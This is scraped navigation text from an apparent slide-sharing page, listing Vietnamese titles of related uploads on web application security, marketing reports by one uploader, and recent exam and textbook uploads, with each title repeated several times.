Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)Luc Cao
 
Trung tâm đào tạo
Trung tâm đào tạoTrung tâm đào tạo
Trung tâm đào tạoLuc Cao
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongVu Trung Kien
 
báo cáo thực tập Athena - tuần1
báo cáo thực tập Athena - tuần1báo cáo thực tập Athena - tuần1
báo cáo thực tập Athena - tuần1Luc Cao
 
Bao cao tttn an ninh web
Bao cao tttn   an ninh webBao cao tttn   an ninh web
Bao cao tttn an ninh webNhóc Mèo
 
Dos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.comDos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.comphanleson
 
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chốngĐồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chốngnataliej4
 
File inclusion attack(nop thay)
File inclusion attack(nop thay)File inclusion attack(nop thay)
File inclusion attack(nop thay)phanleson
 
Tan cong
Tan congTan cong
Tan congtoan
 
một số phương pháp tấn công và phòng chống trong không gian mạng
một số phương pháp tấn công và phòng chống trong không gian mạngmột số phương pháp tấn công và phòng chống trong không gian mạng
một số phương pháp tấn công và phòng chống trong không gian mạngNguynQuangKhangMinh
 
Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNgoc Dao
 
Reveal the Power of Php
Reveal the Power of PhpReveal the Power of Php
Reveal the Power of PhpVõ Duy Tuấn
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTMasterCode.vn
 
Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2Luc Cao
 
Bao cao session hijacking it-slideshares.blogspot.com
Bao cao session hijacking it-slideshares.blogspot.comBao cao session hijacking it-slideshares.blogspot.com
Bao cao session hijacking it-slideshares.blogspot.comphanleson
 
Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2Luc Cao
 

Semelhante a Web application-security (20)

Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
 
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
 
Trung tâm đào tạo
Trung tâm đào tạoTrung tâm đào tạo
Trung tâm đào tạo
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chong
 
báo cáo thực tập Athena - tuần1
báo cáo thực tập Athena - tuần1báo cáo thực tập Athena - tuần1
báo cáo thực tập Athena - tuần1
 
Bảo mật ứng dụng web
Bảo mật ứng dụng webBảo mật ứng dụng web
Bảo mật ứng dụng web
 
Bao cao tttn an ninh web
Bao cao tttn   an ninh webBao cao tttn   an ninh web
Bao cao tttn an ninh web
 
Dos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.comDos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.com
 
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chốngĐồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
 
File inclusion attack(nop thay)
File inclusion attack(nop thay)File inclusion attack(nop thay)
File inclusion attack(nop thay)
 
Tan cong
Tan congTan cong
Tan cong
 
ATTT.pptx
ATTT.pptxATTT.pptx
ATTT.pptx
 
một số phương pháp tấn công và phòng chống trong không gian mạng
một số phương pháp tấn công và phòng chống trong không gian mạngmột số phương pháp tấn công và phòng chống trong không gian mạng
một số phương pháp tấn công và phòng chống trong không gian mạng
 
Slide
SlideSlide
Slide
 
Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần application
 
Reveal the Power of Php
Reveal the Power of PhpReveal the Power of Php
Reveal the Power of Php
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
 
Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2
 
Bao cao session hijacking it-slideshares.blogspot.com
Bao cao session hijacking it-slideshares.blogspot.comBao cao session hijacking it-slideshares.blogspot.com
Bao cao session hijacking it-slideshares.blogspot.com
 
Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2
 

Mais de Visla Team

CÔNG TY TBWA - BÁO CÁO CUỐI KHÓA
CÔNG TY TBWA - BÁO CÁO CUỐI KHÓA CÔNG TY TBWA - BÁO CÁO CUỐI KHÓA
CÔNG TY TBWA - BÁO CÁO CUỐI KHÓA Visla Team
 
Quảng Cáo của saatchi & saatchi
Quảng Cáo của saatchi & saatchiQuảng Cáo của saatchi & saatchi
Quảng Cáo của saatchi & saatchiVisla Team
 
BÁO CÁO CUỐI KHÓA - MÔN QUẢNG CÁO weiden and kennedy
BÁO CÁO CUỐI KHÓA - MÔN QUẢNG CÁO weiden and kennedyBÁO CÁO CUỐI KHÓA - MÔN QUẢNG CÁO weiden and kennedy
BÁO CÁO CUỐI KHÓA - MÔN QUẢNG CÁO weiden and kennedyVisla Team
 
PHÂN TÍCH CHIẾN DỊCH QUẢNG CÁO CỦA Ogilvy & Mather
PHÂN TÍCH CHIẾN DỊCH QUẢNG CÁO CỦA Ogilvy & Mather PHÂN TÍCH CHIẾN DỊCH QUẢNG CÁO CỦA Ogilvy & Mather
PHÂN TÍCH CHIẾN DỊCH QUẢNG CÁO CỦA Ogilvy & Mather Visla Team
 
TỔNG HỢP CÁC CUỘC KHỦNG HOẢNG TRUYỀN THÔNG GẦN ĐÂY (2014)
TỔNG HỢP CÁC CUỘC KHỦNG HOẢNG TRUYỀN THÔNG GẦN ĐÂY (2014)TỔNG HỢP CÁC CUỘC KHỦNG HOẢNG TRUYỀN THÔNG GẦN ĐÂY (2014)
TỔNG HỢP CÁC CUỘC KHỦNG HOẢNG TRUYỀN THÔNG GẦN ĐÂY (2014)Visla Team
 
BÁO CÁO CUỐI KHÓA – GOLDEN COMMUNICATION GROUP
BÁO CÁO CUỐI KHÓA – GOLDEN COMMUNICATION GROUPBÁO CÁO CUỐI KHÓA – GOLDEN COMMUNICATION GROUP
BÁO CÁO CUỐI KHÓA – GOLDEN COMMUNICATION GROUPVisla Team
 
14 BUOC DE TRO THANH MOT NHA MOI GIOI BAT DONG SAN CHUYEN NGHIEP
14 BUOC DE TRO THANH MOT NHA MOI GIOI BAT DONG SAN CHUYEN NGHIEP14 BUOC DE TRO THANH MOT NHA MOI GIOI BAT DONG SAN CHUYEN NGHIEP
14 BUOC DE TRO THANH MOT NHA MOI GIOI BAT DONG SAN CHUYEN NGHIEPVisla Team
 
CÓ NÊN THÔNG QUA MÔI GIỚI ĐỂ BÁN NHÀ HAY KHÔNG
CÓ NÊN THÔNG QUA MÔI GIỚI ĐỂ BÁN NHÀ HAY KHÔNGCÓ NÊN THÔNG QUA MÔI GIỚI ĐỂ BÁN NHÀ HAY KHÔNG
CÓ NÊN THÔNG QUA MÔI GIỚI ĐỂ BÁN NHÀ HAY KHÔNGVisla Team
 
TẠO DANH SÁCH BẤT ĐỘNG SẢN HIỆU QUẢ
TẠO DANH SÁCH BẤT ĐỘNG SẢN HIỆU QUẢTẠO DANH SÁCH BẤT ĐỘNG SẢN HIỆU QUẢ
TẠO DANH SÁCH BẤT ĐỘNG SẢN HIỆU QUẢVisla Team
 
BÁO CÁO NGOẠI KHÓA CHUYÊN NGÀNH MARKETING
BÁO CÁO NGOẠI KHÓA CHUYÊN NGÀNH MARKETINGBÁO CÁO NGOẠI KHÓA CHUYÊN NGÀNH MARKETING
BÁO CÁO NGOẠI KHÓA CHUYÊN NGÀNH MARKETINGVisla Team
 
ẢNH HƯỞNG CỦA VĂN HÓA VIỆT NAM (CẤP ĐỘ CÁ NHÂN) ĐẾN HOẠT ĐỘNG CỦA CÁC DOAN...
ẢNH HƯỞNG CỦA VĂN HÓA VIỆT NAM  (CẤP ĐỘ CÁ NHÂN) ĐẾN HOẠT ĐỘNG  CỦA CÁC  DOAN...ẢNH HƯỞNG CỦA VĂN HÓA VIỆT NAM  (CẤP ĐỘ CÁ NHÂN) ĐẾN HOẠT ĐỘNG  CỦA CÁC  DOAN...
ẢNH HƯỞNG CỦA VĂN HÓA VIỆT NAM (CẤP ĐỘ CÁ NHÂN) ĐẾN HOẠT ĐỘNG CỦA CÁC DOAN...Visla Team
 
GIAO TIẾP KINH DOANH - KIỂM TRA - VĂN HÓA CÁC CHÂU LỤC, NƯỚC SẢN XUẤT VÀ MÃ V...
GIAO TIẾP KINH DOANH - KIỂM TRA - VĂN HÓA CÁC CHÂU LỤC, NƯỚC SẢN XUẤT VÀ MÃ V...GIAO TIẾP KINH DOANH - KIỂM TRA - VĂN HÓA CÁC CHÂU LỤC, NƯỚC SẢN XUẤT VÀ MÃ V...
GIAO TIẾP KINH DOANH - KIỂM TRA - VĂN HÓA CÁC CHÂU LỤC, NƯỚC SẢN XUẤT VÀ MÃ V...Visla Team
 
NỘI DUNG ÔN THI MÔN GIAO TIẾP KINH DOANH
NỘI DUNG ÔN THI MÔN GIAO TIẾP KINH DOANHNỘI DUNG ÔN THI MÔN GIAO TIẾP KINH DOANH
NỘI DUNG ÔN THI MÔN GIAO TIẾP KINH DOANHVisla Team
 
TIEU CHUAN VA BI QUYET THANH CONG TRONG NGANH BAT DONG SAN
TIEU CHUAN VA BI QUYET THANH CONG TRONG NGANH BAT DONG SANTIEU CHUAN VA BI QUYET THANH CONG TRONG NGANH BAT DONG SAN
TIEU CHUAN VA BI QUYET THANH CONG TRONG NGANH BAT DONG SANVisla Team
 
QUẢN TRỊ RỦI RO - XUẤT KHẨU TRÁI CÂY NHIỆT ĐỚI QUA TRUNG QUỐC
QUẢN TRỊ RỦI RO - XUẤT KHẨU TRÁI CÂY NHIỆT ĐỚI QUA TRUNG QUỐCQUẢN TRỊ RỦI RO - XUẤT KHẨU TRÁI CÂY NHIỆT ĐỚI QUA TRUNG QUỐC
QUẢN TRỊ RỦI RO - XUẤT KHẨU TRÁI CÂY NHIỆT ĐỚI QUA TRUNG QUỐCVisla Team
 
QUẢN TRỊ THƯƠNG HIỆU - DỰ ÁN KINH DOANH SON GẤC
QUẢN TRỊ THƯƠNG HIỆU - DỰ ÁN KINH DOANH SON GẤCQUẢN TRỊ THƯƠNG HIỆU - DỰ ÁN KINH DOANH SON GẤC
QUẢN TRỊ THƯƠNG HIỆU - DỰ ÁN KINH DOANH SON GẤCVisla Team
 
FIREWALL ATTACK AND DEFENCE
FIREWALL ATTACK AND DEFENCEFIREWALL ATTACK AND DEFENCE
FIREWALL ATTACK AND DEFENCEVisla Team
 
GỐM SỨ MỸ NGHỆ - MÔ HÌNH KIM CƯƠNG MICHAEL PORTER
GỐM SỨ MỸ NGHỆ - MÔ HÌNH KIM CƯƠNG MICHAEL PORTERGỐM SỨ MỸ NGHỆ - MÔ HÌNH KIM CƯƠNG MICHAEL PORTER
GỐM SỨ MỸ NGHỆ - MÔ HÌNH KIM CƯƠNG MICHAEL PORTERVisla Team
 
EVENT - QUẢN TRỊ RỦI RO TRONG TỔ CHỨC SỰ KIỆN
EVENT - QUẢN TRỊ RỦI RO TRONG TỔ CHỨC SỰ KIỆNEVENT - QUẢN TRỊ RỦI RO TRONG TỔ CHỨC SỰ KIỆN
EVENT - QUẢN TRỊ RỦI RO TRONG TỔ CHỨC SỰ KIỆNVisla Team
 
KINH TẾ QUỐC TẾ - ĐẤT HIẾM VÀ HẠN NGẠCH QUOTA
KINH TẾ QUỐC TẾ - ĐẤT HIẾM VÀ HẠN NGẠCH QUOTAKINH TẾ QUỐC TẾ - ĐẤT HIẾM VÀ HẠN NGẠCH QUOTA
KINH TẾ QUỐC TẾ - ĐẤT HIẾM VÀ HẠN NGẠCH QUOTAVisla Team
 

Mais de Visla Team (20)

CÔNG TY TBWA - BÁO CÁO CUỐI KHÓA
CÔNG TY TBWA - BÁO CÁO CUỐI KHÓA CÔNG TY TBWA - BÁO CÁO CUỐI KHÓA
CÔNG TY TBWA - BÁO CÁO CUỐI KHÓA
 
Quảng Cáo của saatchi & saatchi
Quảng Cáo của saatchi & saatchiQuảng Cáo của saatchi & saatchi
Quảng Cáo của saatchi & saatchi
 
BÁO CÁO CUỐI KHÓA - MÔN QUẢNG CÁO weiden and kennedy
BÁO CÁO CUỐI KHÓA - MÔN QUẢNG CÁO weiden and kennedyBÁO CÁO CUỐI KHÓA - MÔN QUẢNG CÁO weiden and kennedy
BÁO CÁO CUỐI KHÓA - MÔN QUẢNG CÁO weiden and kennedy
 
PHÂN TÍCH CHIẾN DỊCH QUẢNG CÁO CỦA Ogilvy & Mather
PHÂN TÍCH CHIẾN DỊCH QUẢNG CÁO CỦA Ogilvy & Mather PHÂN TÍCH CHIẾN DỊCH QUẢNG CÁO CỦA Ogilvy & Mather
PHÂN TÍCH CHIẾN DỊCH QUẢNG CÁO CỦA Ogilvy & Mather
 
TỔNG HỢP CÁC CUỘC KHỦNG HOẢNG TRUYỀN THÔNG GẦN ĐÂY (2014)
TỔNG HỢP CÁC CUỘC KHỦNG HOẢNG TRUYỀN THÔNG GẦN ĐÂY (2014)TỔNG HỢP CÁC CUỘC KHỦNG HOẢNG TRUYỀN THÔNG GẦN ĐÂY (2014)
TỔNG HỢP CÁC CUỘC KHỦNG HOẢNG TRUYỀN THÔNG GẦN ĐÂY (2014)
 
BÁO CÁO CUỐI KHÓA – GOLDEN COMMUNICATION GROUP
BÁO CÁO CUỐI KHÓA – GOLDEN COMMUNICATION GROUPBÁO CÁO CUỐI KHÓA – GOLDEN COMMUNICATION GROUP
BÁO CÁO CUỐI KHÓA – GOLDEN COMMUNICATION GROUP
 
14 BUOC DE TRO THANH MOT NHA MOI GIOI BAT DONG SAN CHUYEN NGHIEP
14 BUOC DE TRO THANH MOT NHA MOI GIOI BAT DONG SAN CHUYEN NGHIEP14 BUOC DE TRO THANH MOT NHA MOI GIOI BAT DONG SAN CHUYEN NGHIEP
14 BUOC DE TRO THANH MOT NHA MOI GIOI BAT DONG SAN CHUYEN NGHIEP
 
CÓ NÊN THÔNG QUA MÔI GIỚI ĐỂ BÁN NHÀ HAY KHÔNG
CÓ NÊN THÔNG QUA MÔI GIỚI ĐỂ BÁN NHÀ HAY KHÔNGCÓ NÊN THÔNG QUA MÔI GIỚI ĐỂ BÁN NHÀ HAY KHÔNG
CÓ NÊN THÔNG QUA MÔI GIỚI ĐỂ BÁN NHÀ HAY KHÔNG
 
TẠO DANH SÁCH BẤT ĐỘNG SẢN HIỆU QUẢ
TẠO DANH SÁCH BẤT ĐỘNG SẢN HIỆU QUẢTẠO DANH SÁCH BẤT ĐỘNG SẢN HIỆU QUẢ
TẠO DANH SÁCH BẤT ĐỘNG SẢN HIỆU QUẢ
 
BÁO CÁO NGOẠI KHÓA CHUYÊN NGÀNH MARKETING
BÁO CÁO NGOẠI KHÓA CHUYÊN NGÀNH MARKETINGBÁO CÁO NGOẠI KHÓA CHUYÊN NGÀNH MARKETING
BÁO CÁO NGOẠI KHÓA CHUYÊN NGÀNH MARKETING
 
ẢNH HƯỞNG CỦA VĂN HÓA VIỆT NAM (CẤP ĐỘ CÁ NHÂN) ĐẾN HOẠT ĐỘNG CỦA CÁC DOAN...
ẢNH HƯỞNG CỦA VĂN HÓA VIỆT NAM  (CẤP ĐỘ CÁ NHÂN) ĐẾN HOẠT ĐỘNG  CỦA CÁC  DOAN...ẢNH HƯỞNG CỦA VĂN HÓA VIỆT NAM  (CẤP ĐỘ CÁ NHÂN) ĐẾN HOẠT ĐỘNG  CỦA CÁC  DOAN...
ẢNH HƯỞNG CỦA VĂN HÓA VIỆT NAM (CẤP ĐỘ CÁ NHÂN) ĐẾN HOẠT ĐỘNG CỦA CÁC DOAN...
 
GIAO TIẾP KINH DOANH - KIỂM TRA - VĂN HÓA CÁC CHÂU LỤC, NƯỚC SẢN XUẤT VÀ MÃ V...
GIAO TIẾP KINH DOANH - KIỂM TRA - VĂN HÓA CÁC CHÂU LỤC, NƯỚC SẢN XUẤT VÀ MÃ V...GIAO TIẾP KINH DOANH - KIỂM TRA - VĂN HÓA CÁC CHÂU LỤC, NƯỚC SẢN XUẤT VÀ MÃ V...
GIAO TIẾP KINH DOANH - KIỂM TRA - VĂN HÓA CÁC CHÂU LỤC, NƯỚC SẢN XUẤT VÀ MÃ V...
 
NỘI DUNG ÔN THI MÔN GIAO TIẾP KINH DOANH
NỘI DUNG ÔN THI MÔN GIAO TIẾP KINH DOANHNỘI DUNG ÔN THI MÔN GIAO TIẾP KINH DOANH
NỘI DUNG ÔN THI MÔN GIAO TIẾP KINH DOANH
 
TIEU CHUAN VA BI QUYET THANH CONG TRONG NGANH BAT DONG SAN
TIEU CHUAN VA BI QUYET THANH CONG TRONG NGANH BAT DONG SANTIEU CHUAN VA BI QUYET THANH CONG TRONG NGANH BAT DONG SAN
TIEU CHUAN VA BI QUYET THANH CONG TRONG NGANH BAT DONG SAN
 
QUẢN TRỊ RỦI RO - XUẤT KHẨU TRÁI CÂY NHIỆT ĐỚI QUA TRUNG QUỐC
QUẢN TRỊ RỦI RO - XUẤT KHẨU TRÁI CÂY NHIỆT ĐỚI QUA TRUNG QUỐCQUẢN TRỊ RỦI RO - XUẤT KHẨU TRÁI CÂY NHIỆT ĐỚI QUA TRUNG QUỐC
QUẢN TRỊ RỦI RO - XUẤT KHẨU TRÁI CÂY NHIỆT ĐỚI QUA TRUNG QUỐC
 
QUẢN TRỊ THƯƠNG HIỆU - DỰ ÁN KINH DOANH SON GẤC
QUẢN TRỊ THƯƠNG HIỆU - DỰ ÁN KINH DOANH SON GẤCQUẢN TRỊ THƯƠNG HIỆU - DỰ ÁN KINH DOANH SON GẤC
QUẢN TRỊ THƯƠNG HIỆU - DỰ ÁN KINH DOANH SON GẤC
 
FIREWALL ATTACK AND DEFENCE
FIREWALL ATTACK AND DEFENCEFIREWALL ATTACK AND DEFENCE
FIREWALL ATTACK AND DEFENCE
 
GỐM SỨ MỸ NGHỆ - MÔ HÌNH KIM CƯƠNG MICHAEL PORTER
GỐM SỨ MỸ NGHỆ - MÔ HÌNH KIM CƯƠNG MICHAEL PORTERGỐM SỨ MỸ NGHỆ - MÔ HÌNH KIM CƯƠNG MICHAEL PORTER
GỐM SỨ MỸ NGHỆ - MÔ HÌNH KIM CƯƠNG MICHAEL PORTER
 
EVENT - QUẢN TRỊ RỦI RO TRONG TỔ CHỨC SỰ KIỆN
EVENT - QUẢN TRỊ RỦI RO TRONG TỔ CHỨC SỰ KIỆNEVENT - QUẢN TRỊ RỦI RO TRONG TỔ CHỨC SỰ KIỆN
EVENT - QUẢN TRỊ RỦI RO TRONG TỔ CHỨC SỰ KIỆN
 
KINH TẾ QUỐC TẾ - ĐẤT HIẾM VÀ HẠN NGẠCH QUOTA
KINH TẾ QUỐC TẾ - ĐẤT HIẾM VÀ HẠN NGẠCH QUOTAKINH TẾ QUỐC TẾ - ĐẤT HIẾM VÀ HẠN NGẠCH QUOTA
KINH TẾ QUỐC TẾ - ĐẤT HIẾM VÀ HẠN NGẠCH QUOTA
 

Último

30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...Nguyen Thanh Tu Collection
 
ĐỀ KIỂM TRA CUỐI KÌ 2 BIÊN SOẠN THEO ĐỊNH HƯỚNG ĐỀ BGD 2025 MÔN TOÁN 10 - CÁN...
ĐỀ KIỂM TRA CUỐI KÌ 2 BIÊN SOẠN THEO ĐỊNH HƯỚNG ĐỀ BGD 2025 MÔN TOÁN 10 - CÁN...ĐỀ KIỂM TRA CUỐI KÌ 2 BIÊN SOẠN THEO ĐỊNH HƯỚNG ĐỀ BGD 2025 MÔN TOÁN 10 - CÁN...
ĐỀ KIỂM TRA CUỐI KÌ 2 BIÊN SOẠN THEO ĐỊNH HƯỚNG ĐỀ BGD 2025 MÔN TOÁN 10 - CÁN...Nguyen Thanh Tu Collection
 
bài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hànhbài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hànhdangdinhkien2k4
 
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdfltbdieu
 
Giáo trình xây dựng thực đơn. Ths Hoang Ngoc Hien.pdf
Giáo trình xây dựng thực đơn. Ths Hoang Ngoc Hien.pdfGiáo trình xây dựng thực đơn. Ths Hoang Ngoc Hien.pdf
Giáo trình xây dựng thực đơn. Ths Hoang Ngoc Hien.pdf4pdx29gsr9
 
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdf
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdfSLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdf
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdfhoangtuansinh1
 
TUYỂN TẬP ĐỀ THI GIỮA KÌ, CUỐI KÌ 2 MÔN VẬT LÍ LỚP 11 THEO HÌNH THỨC THI MỚI ...
TUYỂN TẬP ĐỀ THI GIỮA KÌ, CUỐI KÌ 2 MÔN VẬT LÍ LỚP 11 THEO HÌNH THỨC THI MỚI ...TUYỂN TẬP ĐỀ THI GIỮA KÌ, CUỐI KÌ 2 MÔN VẬT LÍ LỚP 11 THEO HÌNH THỨC THI MỚI ...
TUYỂN TẬP ĐỀ THI GIỮA KÌ, CUỐI KÌ 2 MÔN VẬT LÍ LỚP 11 THEO HÌNH THỨC THI MỚI ...Nguyen Thanh Tu Collection
 
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoi
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoiC6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoi
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoidnghia2002
 
20 ĐỀ DỰ ĐOÁN - PHÁT TRIỂN ĐỀ MINH HỌA BGD KỲ THI TỐT NGHIỆP THPT NĂM 2024 MÔ...
20 ĐỀ DỰ ĐOÁN - PHÁT TRIỂN ĐỀ MINH HỌA BGD KỲ THI TỐT NGHIỆP THPT NĂM 2024 MÔ...20 ĐỀ DỰ ĐOÁN - PHÁT TRIỂN ĐỀ MINH HỌA BGD KỲ THI TỐT NGHIỆP THPT NĂM 2024 MÔ...
20 ĐỀ DỰ ĐOÁN - PHÁT TRIỂN ĐỀ MINH HỌA BGD KỲ THI TỐT NGHIỆP THPT NĂM 2024 MÔ...Nguyen Thanh Tu Collection
 
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdfxemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdfXem Số Mệnh
 
Bài học phòng cháy chữa cháy - PCCC tại tòa nhà
Bài học phòng cháy chữa cháy - PCCC tại tòa nhàBài học phòng cháy chữa cháy - PCCC tại tòa nhà
Bài học phòng cháy chữa cháy - PCCC tại tòa nhàNguyen Thi Trang Nhung
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
bài thi bảo vệ nền tảng tư tưởng của Đảng.docx
bài thi bảo vệ nền tảng tư tưởng của Đảng.docxbài thi bảo vệ nền tảng tư tưởng của Đảng.docx
bài thi bảo vệ nền tảng tư tưởng của Đảng.docxTrnHiYn5
 
các nội dung phòng chống xâm hại tình dục ở trẻ em
các nội dung phòng chống xâm hại tình dục ở trẻ emcác nội dung phòng chống xâm hại tình dục ở trẻ em
các nội dung phòng chống xâm hại tình dục ở trẻ emTrangNhung96
 
Access: Chuong III Thiet ke truy van Query.ppt
Access: Chuong III Thiet ke truy van Query.pptAccess: Chuong III Thiet ke truy van Query.ppt
Access: Chuong III Thiet ke truy van Query.pptPhamThiThuThuy1
 
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdf
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdfxemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdf
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdfXem Số Mệnh
 
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngGiới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngYhoccongdong.com
 
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...Nguyen Thanh Tu Collection
 
Giáo trình nhập môn lập trình - Đặng Bình Phương
Giáo trình nhập môn lập trình - Đặng Bình PhươngGiáo trình nhập môn lập trình - Đặng Bình Phương
Giáo trình nhập môn lập trình - Đặng Bình Phươnghazzthuan
 

Último (20)

30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
